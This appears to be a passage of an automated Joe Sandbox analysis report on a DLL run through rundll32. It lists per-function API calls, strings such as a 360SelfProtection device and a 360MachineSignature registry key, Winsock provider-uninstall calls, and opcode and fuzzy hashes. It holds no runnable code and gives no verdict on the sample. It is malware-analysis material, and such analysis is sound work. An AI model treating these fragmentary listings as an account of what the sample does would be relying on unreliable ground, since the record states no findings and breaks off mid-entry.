Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$CloseHandleProcess$ExceptionLockMutexReleaseThrowUnlockWalk
String ID:
API String ID: 2337826640-0
Opcode ID: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
Instruction ID: 33d5259c6290a7581a5ad5f3dc980324b092c5f168283266ec493f33f9dd72fa
Opcode Fuzzy Hash: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
Instruction Fuzzy Hash: BB111632601A49CAEB869F21EC543E82360FB4CBD5F19D525BA190B6A5DF34C75DC340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180064040 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000018006405B
SysFreeString.OLEAUT32 ref: 0000000180064070
SysFreeString.OLEAUT32 ref: 0000000180064085
SysFreeString.OLEAUT32 ref: 000000018006409A
SysFreeString.OLEAUT32 ref: 00000001800640AF
SysFreeString.OLEAUT32 ref: 00000001800640C4
SysFreeString.OLEAUT32 ref: 00000001800640D9

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
Instruction ID: c87333ac7bcb44b69379473da2adcf9225e28ba0b3bfb3a3c4204cf647e2c29f
Opcode Fuzzy Hash: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
Instruction Fuzzy Hash: B5110337612B08C6FB96DF64D8583682360FB5DFA9F258704DA6B49599CF38C64DC340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018E8C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41fileCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018E96
CreateFileW.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018EC6
DeviceIoControl.KERNEL32 ref: 0000000180018F04
CloseHandle.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018F0F

Strings

\\.\360SelfProtection, xrefs: 0000000180018E9E
L ", xrefs: 0000000180018EFC

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CloseControlCreateCurrentDeviceFileHandleProcess
String ID: L "$\\.\360SelfProtection
API String ID: 3778458602-907869749
Opcode ID: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
Instruction ID: 4989c80b025c73f727db9230e342af37d309858987cbaecb77f10a65d22bbdba
Opcode Fuzzy Hash: e256c9444f2bf81226e555b6f7292d8a7bd12b46bc34df817c0f54cce6c08caa
Instruction Fuzzy Hash: F6111C32618B84D7C7518F64F88478AB7A0F78C7A4F444725E6AA43B68EF78C65CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800184B8 Relevance: 9.3, APIs: 6, Instructions: 270COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000180018666
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001868A
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800186B7
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800186D7

Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 0000000180042FFB
Part of subcall function 0000000180042FC4: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043016
Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 000000018004306B

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018867

Part of subcall function 000000018004388C: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043AB7

Part of subcall function 0000000180043F2C: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180044096

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$??3@
String ID:
API String ID: 652292005-0
Opcode ID: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
Instruction ID: 16cab60fb696caa1ac382d07db4514fcd7f2788f0d4e97422f2d8c76aa010f09
Opcode Fuzzy Hash: d5eaac9880b29e7d0af136669fdebebd909549339380b54f119e65074af5ce41
Instruction Fuzzy Hash: 95C14A32B00B449AEB61CFA1E8407DD33B6F748798F548125EE9967B98DF34C62AD344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004D74 Relevance: 9.2, APIs: 6, Instructions: 219COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 0000000180004E12
wcsstr.MSVCRT ref: 0000000180004E38
wcsstr.MSVCRT ref: 0000000180004EF1
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,0000000180001A9F), ref: 0000000180004F53
wcsstr.MSVCRT ref: 0000000180004FBE
_errno.MSVCRT ref: 000000018000504A

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: wcsstr$_errnomemmove
String ID:
API String ID: 3323953840-0
Opcode ID: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
Instruction ID: 824f22201ec0d57d4a2227744580b71807502b4fbd2fda829f419a9b6e1dff6e
Opcode Fuzzy Hash: 251354a66c982ebe395b5198ba1b60466afa3abfe6d2f318c4ac3c1dc85cfacb
Instruction Fuzzy Hash: CF810572701A4881EAA6DB14A4447AE77A0FB4CBE4F15C215FFAE4B7D4DE38C6498704

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800505E0 Relevance: 9.2, APIs: 6, Instructions: 196networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 0000000180050638
WSCDeinstallProvider.WS2_32 ref: 00000001800507A4
WSCDeinstallProvider32.WS2_32 ref: 00000001800507AC
WSCDeinstallProvider.WS2_32 ref: 0000000180050862
WSCDeinstallProvider32.WS2_32 ref: 000000018005086A
WSACleanup.WS2_32 ref: 00000001800508F4

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Deinstall$ProviderProvider32$CleanupStartup
String ID:
API String ID: 348239931-0
Opcode ID: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
Instruction ID: c360e4d789f3669f84b45de69cf2c2640493478b51e108b497c61621dba60db4
Opcode Fuzzy Hash: 4fc830036e70fcdad210563e15636e8950cfeeae8d6d629c7bbfe77b3d9d1d9b
Instruction Fuzzy Hash: 48910332604A88C6EB92CB65E4547EE77A4F78C7E4F618111FA8D276A4DF39C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180032E5C Relevance: 9.2, APIs: 6, Instructions: 150COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032EF4
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032F07
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032F1A
SysFreeString.OLEAUT32 ref: 0000000180032F63
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032F76
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032F89

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocHeapProcess
String ID:
API String ID: 195827-0
Opcode ID: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
Instruction ID: 472ff7a9124bb4c66568a88574ce92508997c8508967d0cb70e73e2f7ddd2399
Opcode Fuzzy Hash: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
Instruction Fuzzy Hash: B951BD32701A4886EB46DF65D8403AD73B0FB49BE4F098621EB2957BE9DF38C959C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180034178 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 000000018003420F
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180034222
??3@YAXPEAX@Z.MSVCRT ref: 0000000180034235
SysFreeString.OLEAUT32 ref: 0000000180034279
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003428C
??3@YAXPEAX@Z.MSVCRT ref: 000000018003429F

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocHeapProcess
String ID:
API String ID: 195827-0
Opcode ID: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
Instruction ID: d6e040c62356dd28a52f4054929385a923e12d2376c870478276763e31a13ced
Opcode Fuzzy Hash: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
Instruction Fuzzy Hash: 9D516F33701B4982EB469F65D85039E63A0FB89FA4F498221EB295B7D9DF38C549C340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800322A0 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032337
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003234A
??3@YAXPEAX@Z.MSVCRT ref: 000000018003235D
SysFreeString.OLEAUT32 ref: 00000001800323A1
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800323B4
??3@YAXPEAX@Z.MSVCRT ref: 00000001800323C7

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocHeapProcess
String ID:
API String ID: 195827-0
Opcode ID: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
Instruction ID: b9a7bc9aefba1d0cd95c21a72bfdce90d94dfcaa7ac1bda6bd9d80d9113677c1
Opcode Fuzzy Hash: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
Instruction Fuzzy Hash: 55516032701B4882EB469F65D85039E73A0FB49FE4F098625EB69577D9DF38C649C380

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003288C Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 00000001800298FC: GetFileAttributesW.KERNEL32 ref: 000000018002998C
Part of subcall function 00000001800298FC: GetFileAttributesW.KERNEL32 ref: 000000018002999E

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032923
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032936
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032949
SysFreeString.OLEAUT32 ref: 000000018003298D
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800329A0
??3@YAXPEAX@Z.MSVCRT ref: 00000001800329B3

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$AttributesFile$??2@AllocHeapProcess
String ID:
API String ID: 2343307612-0
Opcode ID: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
Instruction ID: 3edc698dfee31cca13762dbc840380725e1013da3230f8d99093220343b8c6e9
Opcode Fuzzy Hash: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
Instruction Fuzzy Hash: 21515F32701B4882EB46DF65D85039D73A0FB49FA4F098225EB695B7E9DF38C949C380

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180026754 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 142stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800267E9
lstrcmpiW.KERNEL32 ref: 0000000180026826

Strings

ShellEx\IconHandler, xrefs: 0000000180026798
\DefaultIcon, xrefs: 0000000180026863
{42042206-2D85-11D3-8CFF-005004838597}, xrefs: 000000018002681B
clsid\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\, xrefs: 0000000180026851

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: lstrcmpimemset
String ID: ShellEx\IconHandler$\DefaultIcon$clsid\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\${42042206-2D85-11D3-8CFF-005004838597}
API String ID: 3784069311-1340094651
Opcode ID: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
Instruction ID: 9f0af0b831dc55336fcff299f0060eabbe44d87f67dffe850d980bb31fffbbb0
Opcode Fuzzy Hash: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
Instruction Fuzzy Hash: 0251A672601E4982EB52DB29D8817DE6760FB897F4F508312FA6D436E5DF38C689C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800503B8 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180050421
ExpandEnvironmentStringsW.KERNEL32 ref: 0000000180050458
EnterCriticalSection.KERNEL32 ref: 00000001800504D4
LeaveCriticalSection.KERNEL32 ref: 000000018005051D
ExpandEnvironmentStringsW.KERNEL32 ref: 0000000180050544
LeaveCriticalSection.KERNEL32 ref: 00000001800505AF

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterEnvironmentExpandLeaveStrings
String ID:
API String ID: 3103530258-0
Opcode ID: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
Instruction ID: b0c21a69e9994dd49745b429a24057b93f4d6bf7018e4c24e81fb4468a7e2a6c
Opcode Fuzzy Hash: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
Instruction Fuzzy Hash: 0051AF32711A4882EB82CF29D8843DE7761F789BE8F549211FE69176A5DF39C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066808 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 0000000180066883

Part of subcall function 0000000180066608: RegOpenKeyExW.ADVAPI32 ref: 0000000180066653
Part of subcall function 0000000180066608: RegQueryValueExW.ADVAPI32 ref: 0000000180066696
Part of subcall function 0000000180066608: RegCloseKey.ADVAPI32 ref: 00000001800666AA

Strings

"%s" %s, xrefs: 00000001800668D4
/elevated, xrefs: 0000000180066879

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CloseOpenQueryValuewcsstr
String ID: "%s" %s$/elevated
API String ID: 1248106594-1382985213
Opcode ID: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
Instruction ID: f3329ece6a2879d43efc8f52936060a6c90d44f89bf07b9cf1bbe3f09b4200fa
Opcode Fuzzy Hash: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
Instruction Fuzzy Hash: E241A432702B4489EB95CF65D8407DC33A5FB88BD4F15861AAE5E53BA4DF34C659C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180068954 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 000000018006A424: RegOpenKeyExW.ADVAPI32(?,?,?,?,00000000,0000000180068993,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A44B

memset.MSVCRT ref: 00000001800689A4

Part of subcall function 000000018006A490: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,00000001800689D0,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A4A9

Strings

ExpirationDate, xrefs: 0000000180068A4B
IssueDate, xrefs: 0000000180068A07
Operator, xrefs: 00000001800689C1
SignData, xrefs: 0000000180068A87
SOFTWARE\360MachineSignature, xrefs: 0000000180068980

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: OpenQueryValuememset
String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
API String ID: 733315865-1479031278
Opcode ID: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
Instruction ID: ca32e24e8d646fa6672ed224415891838e44a9bb2fa0ab3c5403e0472a1cb0df
Opcode Fuzzy Hash: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
Instruction Fuzzy Hash: DA411972B00B149AFB92DBA5D8447DD73B5BB487C8F148A16AE6853B58EF34C708CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052E84 Relevance: 9.1, APIs: 6, Instructions: 87networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180052EE6
LeaveCriticalSection.KERNEL32 ref: 0000000180052F32
WSAStartup.WS2_32 ref: 0000000180052F68
WSCUnInstallNameSpace.WS2_32 ref: 0000000180052F85
WSAGetLastError.WS2_32 ref: 0000000180052F94

Part of subcall function 00000001800432C8: memset.MSVCRT ref: 0000000180043335

WSACleanup.WS2_32 ref: 0000000180052FA1

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$CleanupEnterErrorInstallLastLeaveNameSpaceStartupmemset
String ID:
API String ID: 3860525367-0
Opcode ID: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
Instruction ID: 37d746e663b56e28a6a3e394405e8b675d481f719bc3bdb0db42ce8d24bf20fd
Opcode Fuzzy Hash: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
Instruction Fuzzy Hash: 57316E31700A4886F6A29F25EC443E973A0FB8DBD5F548531B96A972A1DF39C7898700

Uniqueness

